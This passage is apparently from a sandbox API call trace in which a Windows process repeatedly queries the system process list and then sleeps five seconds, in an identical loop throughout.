ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.943] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.980] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.986] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.993] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.001] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.008] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.014] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.022] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.047] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.054] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.061] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.068] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.076] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.083] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.097] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 